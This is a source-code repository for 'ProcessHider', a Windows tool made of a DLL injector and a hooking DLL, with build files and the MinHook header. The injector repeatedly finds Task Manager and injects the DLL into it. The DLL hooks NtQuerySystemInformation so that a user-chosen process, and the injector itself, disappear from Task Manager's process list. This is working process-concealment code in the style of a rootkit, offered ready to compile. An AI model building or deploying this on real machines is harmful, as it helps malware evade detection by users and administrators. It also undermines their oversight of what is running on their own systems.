├── DLL_Injector ├── .gitignore ├── DLL_Injector.vcxproj ├── DLL_Injector.vcxproj.filters ├── DLL_Injector.vcxproj.user └── main.cpp ├── ProcessHider.sln ├── ProcessHider ├── .gitignore ├── ProcessHider.vcxproj ├── ProcessHider.vcxproj.filters ├── ProcessHider.vcxproj.user ├── main.cpp └── nt_structs.h ├── README.md └── include ├── .gitattributes ├── MinHook.h └── libMinHook.x64.lib /DLL_Injector/.gitignore: -------------------------------------------------------------------------------- 1 | /Debug 2 | /Release 3 | /x64 -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5} 23 | Win32Proj 24 | DLL_Injector 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Console 109 | true 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 121 | true 122 | 123 | 124 | Console 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | MaxSpeed 136 | true 137 | true 138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | true 140 | 141 | 142 | Console 143 | true 144 | true 145 | true 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /DLL_Injector/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | using namespace std; 7 | HANDLE map; 8 | LPVOID buf; 9 | 10 | bool inject_dll(DWORD pid, string dll_path) { 11 | 12 | HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 13 | if (handle == INVALID_HANDLE_VALUE) { 14 | cout << " [-] Open Process Failed" << endl; 15 | return false; 16 | } 17 | else { cout << " [+] Got a Handle to the Remote Process" << endl; } 18 | 19 | LPVOID address = VirtualAllocEx(handle, NULL, dll_path.length() , MEM_COMMIT | MEM_RESERVE, 20 | PAGE_EXECUTE_READWRITE); 21 | if (address == NULL) { 22 | cout << " [-] VirtualAllocEx Failed" << endl; 23 | return false; 24 | } 25 | 26 | bool res = WriteProcessMemory(handle, address, dll_path.c_str(), dll_path.length(), 0); 27 | if (!res) { 28 | cout << " [-] WriteProcessMemory Failed" << endl; 29 | } 30 | if (CreateRemoteThread(handle, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)address, NULL, NULL) == INVALID_HANDLE_VALUE) { 31 | cout << " [-] CreateRemoteThread Failed" << endl; 32 | } 33 | else { cout << " [+] DLL Loaded Into Remote Process" << endl; } 34 | 35 | cout << " [+] Process Hidden" << endl << endl; 36 | CloseHandle(handle); 37 | return true; 38 | } 39 | 40 | void find_and_inject() 41 | { 42 | char* dll_path_c = (char*)malloc(sizeof(char) * 3000); 43 | GetModuleFileNameA(NULL, dll_path_c, 3000); 44 | 45 | DWORD lastpid = 4; 46 | string dll_path(dll_path_c); 47 | size_t index = dll_path.find_last_of('\\'); 48 | dll_path.erase(dll_path.begin() + index, dll_path.end()); 49 | dll_path.append("\\ProcessHider.dll"); 50 | 51 | while (true) { // Keep running to check if TM closes and reopens, if yes then inject again 52 | PROCESSENTRY32 process; 53 | process.dwSize = sizeof(PROCESSENTRY32); 54 | 55 | HANDLE proc_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 56 | if (proc_snap == INVALID_HANDLE_VALUE) { 57 | cout << " [-] CreateToolhelp32Snapshot Failed" << endl; 58 | return; 59 | } 60 | 61 | if (!Process32First(proc_snap, &process)) { 62 | cout << " [-] Process32First Failed" << endl; 63 | return; 64 | } 65 | 66 | do 67 | { 68 | if (!lstrcmp(process.szExeFile, L"Taskmgr.exe") && lastpid != process.th32ProcessID) { 69 | cout << " [+] Task Manager Detected" << endl; 70 | if (!inject_dll(process.th32ProcessID, dll_path)) { 71 | cout << " [-] Unable to Inject DLL!! Check if you are running as Admin" << endl << endl; 72 | break; 73 | } 74 | lastpid = process.th32ProcessID; 75 | } 76 | } while (Process32Next(proc_snap, &process)); 77 | CloseHandle(proc_snap); 78 | Sleep(1000); 79 | } 80 | } 81 | 82 | bool map_process_name(string process) { 83 | map = CreateFileMappingA( 84 | INVALID_HANDLE_VALUE, 85 | NULL, 86 | PAGE_READWRITE, 87 | 0, 88 | 255, 89 | "Global\\GetProcessName" 90 | ); 91 | 92 | if (map == NULL) { 93 | cout << "CreateFileMapping Failed" << endl; 94 | return false; 95 | } 96 | 97 | buf = MapViewOfFile(map, 98 | FILE_MAP_ALL_ACCESS, 99 | 0, 100 | 0, 101 | 255); 102 | 103 | if (buf == NULL) { 104 | cout << "MapViewOfFile Failed" << endl; 105 | CloseHandle(map); 106 | return 0; 107 | } 108 | 109 | CopyMemory(buf, process.c_str(), process.length()); 110 | } 111 | 112 | int main() 113 | { 114 | string process, inp; 115 | cout << " Enter Process Name To Hide" << endl << "--> "; 116 | cin >> process; 117 | cout << endl; 118 | map_process_name(process); 119 | 120 | CreateThread( 121 | NULL, 122 | NULL, 123 | (LPTHREAD_START_ROUTINE)find_and_inject, 124 | NULL, 125 | NULL, 126 | NULL 127 | ); 128 | 129 | cout << "Enter \"quit\" to Quit or Keep this running to inject into future task manager processes" << endl << endl; 130 | while (true) { 131 | cin >> inp; 132 | if (inp == "quit") { 133 | UnmapViewOfFile(buf); 134 | CloseHandle(map); 135 | ExitProcess(0); 136 | } 137 | } 138 | 139 | return 0; 140 | } -------------------------------------------------------------------------------- /ProcessHider.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHider", "ProcessHider\ProcessHider.vcxproj", "{EE6E876F-F989-4AC2-BA2F-55348E03519C}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLL_Injector", "DLL_Injector\DLL_Injector.vcxproj", "{8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.ActiveCfg = Debug|x64 19 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.Build.0 = Debug|x64 20 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.ActiveCfg = Debug|Win32 21 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.Build.0 = Debug|Win32 22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.ActiveCfg = Release|x64 23 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.Build.0 = Release|x64 24 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.ActiveCfg = Release|Win32 25 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.Build.0 = Release|Win32 26 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.ActiveCfg = Debug|x64 27 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.Build.0 = Debug|x64 28 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.ActiveCfg = Debug|Win32 29 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.Build.0 = Debug|Win32 30 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.ActiveCfg = Release|x64 31 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.Build.0 = Release|x64 32 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.ActiveCfg = Release|Win32 33 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /ProcessHider/.gitignore: -------------------------------------------------------------------------------- 1 | /Debug 2 | /Release 3 | /x64 -------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C} 23 | Win32Proj 24 | ProcessHider 25 | 8.1 26 | 27 | 28 | 29 | DynamicLibrary 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | DynamicLibrary 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Windows 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Windows 109 | true 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 121 | true 122 | 123 | 124 | Windows 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | MaxSpeed 136 | true 137 | true 138 | NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 139 | true 140 | MultiThreaded 141 | 142 | 143 | Windows 144 | true 145 | true 146 | true 147 | ../include/libMinHook.x64.lib;%(AdditionalDependencies) 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ProcessHider/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "..\include\MinHook.h" 3 | #include "nt_structs.h" 4 | 5 | #pragma comment(lib, "libMinHook.x64.lib") 6 | 7 | PNT_QUERY_SYSTEM_INFORMATION Original_NtQuerySystemInformation; 8 | PNT_QUERY_SYSTEM_INFORMATION New_NtQuerySystemInformation; 9 | wchar_t* process; 10 | 11 | NTSTATUS WINAPI Hooked_NtQuerySystemInformation( 12 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 13 | PVOID SystemInformation, 14 | ULONG SystemInformationLength, 15 | PULONG ReturnLength) 16 | { 17 | NTSTATUS stat = New_NtQuerySystemInformation( 18 | SystemInformationClass, 19 | SystemInformation, 20 | SystemInformationLength, 21 | ReturnLength); 22 | 23 | if (SystemProcessInformation == SystemInformationClass && stat == 0) 24 | { 25 | P_SYSTEM_PROCESS_INFORMATION prev = P_SYSTEM_PROCESS_INFORMATION(SystemInformation); 26 | P_SYSTEM_PROCESS_INFORMATION curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)prev + prev->NextEntryOffset); 27 | 28 | while (prev->NextEntryOffset != NULL) { 29 | if (!lstrcmp(curr->ImageName.Buffer, process)) { 30 | if (curr->NextEntryOffset == 0) { 31 | prev->NextEntryOffset = 0; // if above process is at last 32 | } 33 | else { 34 | prev->NextEntryOffset += curr->NextEntryOffset; 35 | } 36 | curr = prev; 37 | } 38 | if (!lstrcmp(curr->ImageName.Buffer, L"DLL_Injector.exe")) { 39 | if (curr->NextEntryOffset == 0) { 40 | prev->NextEntryOffset = 0; 41 | } 42 | else { 43 | prev->NextEntryOffset += curr->NextEntryOffset; 44 | } 45 | curr = prev; 46 | } 47 | prev = curr; 48 | curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)curr + curr->NextEntryOffset); 49 | } 50 | } 51 | 52 | return stat; 53 | } 54 | 55 | bool set_nt_hook() 56 | { 57 | HMODULE ntdll = GetModuleHandle(L"ntdll.dll"); 58 | 59 | Original_NtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(ntdll, "NtQuerySystemInformation"); 60 | 61 | if (MH_Initialize() != MH_OK) { return false; } 62 | 63 | if(MH_CreateHook(Original_NtQuerySystemInformation, &Hooked_NtQuerySystemInformation, 64 | (LPVOID*) &New_NtQuerySystemInformation) != MH_OK) { return false; } 65 | 66 | if (MH_EnableHook(Original_NtQuerySystemInformation) != MH_OK) { return false; } 67 | 68 | return true; 69 | } 70 | 71 | void get_process_name() { 72 | HANDLE map = OpenFileMappingA( 73 | FILE_MAP_ALL_ACCESS, 74 | FALSE, 75 | "Global\\GetProcessName" 76 | ); 77 | 78 | LPVOID buf = MapViewOfFile(map, // handle to map object 79 | FILE_MAP_ALL_ACCESS, // read/write permission 80 | 0, 81 | 0, 82 | 255); 83 | 84 | process = (wchar_t*)malloc(255 * sizeof(wchar_t)); 85 | MultiByteToWideChar(CP_UTF8, 0, (char*)buf, -1, process, 255); 86 | 87 | UnmapViewOfFile(buf); 88 | CloseHandle(map); 89 | } 90 | 91 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) 92 | { 93 | switch(fdwReason) 94 | { 95 | case DLL_PROCESS_ATTACH: 96 | if (!set_nt_hook()) { 97 | return FALSE; 98 | } 99 | get_process_name(); 100 | break; 101 | case DLL_PROCESS_DETACH: 102 | MH_DisableHook(Original_NtQuerySystemInformation); 103 | MH_Uninitialize(); 104 | break; 105 | } 106 | 107 | return TRUE; 108 | } -------------------------------------------------------------------------------- /ProcessHider/nt_structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | typedef NTSTATUS(WINAPI *PNT_QUERY_SYSTEM_INFORMATION)( 5 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 6 | PVOID SystemInformation, 7 | ULONG SystemInformationLength, 8 | PULONG ReturnLength 9 | ); 10 | 11 | typedef struct __SYSTEM_PROCESS_INFORMATION { 12 | ULONG NextEntryOffset; 13 | ULONG NumberOfThreads; 14 | LARGE_INTEGER WorkingSetPrivateSize; 15 | ULONG HardFaultCount; 16 | ULONG NumberOfThreadsHighWatermark; 17 | ULONGLONG CycleTime; 18 | LARGE_INTEGER CreateTime; 19 | LARGE_INTEGER UserTime; 20 | LARGE_INTEGER KernelTime; 21 | UNICODE_STRING ImageName; 22 | LONG BasePriority; 23 | PVOID UniqueProcessId; 24 | PVOID InheritedFromUniqueProcessId; 25 | ULONG HandleCount; 26 | ULONG SessionId; 27 | ULONG_PTR UniqueProcessKey; 28 | ULONG_PTR PeakVirtualSize; 29 | ULONG_PTR VirtualSize; 30 | ULONG PageFaultCount; 31 | ULONG_PTR PeakWorkingSetSize; 32 | ULONG_PTR WorkingSetSize; 33 | ULONG_PTR QuotaPeakPagedPoolUsage; 34 | ULONG_PTR QuotaPagedPoolUsage; 35 | ULONG_PTR QuotaPeakNonPagedPoolUsage; 36 | ULONG_PTR QuotaNonPagedPoolUsage; 37 | ULONG_PTR PagefileUsage; 38 | ULONG_PTR PeakPagefileUsage; 39 | ULONG_PTR PrivatePageCount; 40 | LARGE_INTEGER ReadOperationCount; 41 | LARGE_INTEGER WriteOperationCount; 42 | LARGE_INTEGER OtherOperationCount; 43 | LARGE_INTEGER ReadTransferCount; 44 | LARGE_INTEGER WriteTransferCount; 45 | LARGE_INTEGER OtherTransferCount; 46 | } S_SYSTEM_PROCESS_INFORMATION, *P_SYSTEM_PROCESS_INFORMATION; -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ProcessHider 2 | 3 | Process Hider uses Windows API Hooking to Hide a Process from TaskManager. It utilises Minhook Library to hook NtQuerySystemInformation function so whenever NtQuerySystemInformation is called our function executes which removes the chosen process from Process List returned by the original function. 4 | 5 | There are 2 projects inside the repo, the main one is ProcessHider which produces the DLL that is injected inside Task Manager. The second one is the DLL injector whose main job is to inject the DLL and pass the name of the process to hide. 6 | 7 | ## To Compile: 8 | ``` Clone the repo and open the solution file in Visual Studio``` 9 | -------------------------------------------------------------------------------- /include/.gitattributes: -------------------------------------------------------------------------------- 1 | *.h text 2 | *.lib binary 3 | -------------------------------------------------------------------------------- /include/MinHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2017 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszTarget [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszTarget [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /include/libMinHook.x64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kernelm0de/ProcessHider/b9ae6634e8277c152c8e7ac6b867055d0087c977/include/libMinHook.x64.lib --------------------------------------------------------------------------------